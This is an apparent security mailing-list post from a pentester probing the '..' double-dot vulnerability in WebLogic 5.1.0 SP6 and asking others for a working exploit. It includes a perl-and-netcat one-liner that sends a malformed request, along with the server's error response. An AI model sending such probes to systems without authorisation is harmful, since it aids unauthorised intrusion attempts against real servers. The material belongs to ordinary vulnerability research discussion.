WebLogic 5.1.0 SP < SP6

["Matt W." <kmx () EGATOBAS ORG>]

Was pentesting a few WebLogic 5.1.0 SP6 webservers and came across the
".." Double Dot Vulnerability (bugtraq id 2138 ) and was wondering if
anyone has successfully created an exploit for this.

I've been playing with it and all i can get out of the weblogic server
is the following

perl -e 'print "GET" . "/.." . "A" x 10 . "HTTP/1.0" . "\n\n"' | nc
<server> <port>

HTTP/1.1 500 internal Server Error
Server: Weblogic 5.1.0 Service Pack 6 09/20/2000
Content-Length: 0
Conten-Type: text/html
Connection:Close
java.lang.NullPointerException

<disconnect>

Server Stays up no crash

The other interesting thing is if you put a space between the GET and
the /.. it still does the above but if put a space between the A's and
the HTTP/1.0 there is no error.

anyone got more info?

-matt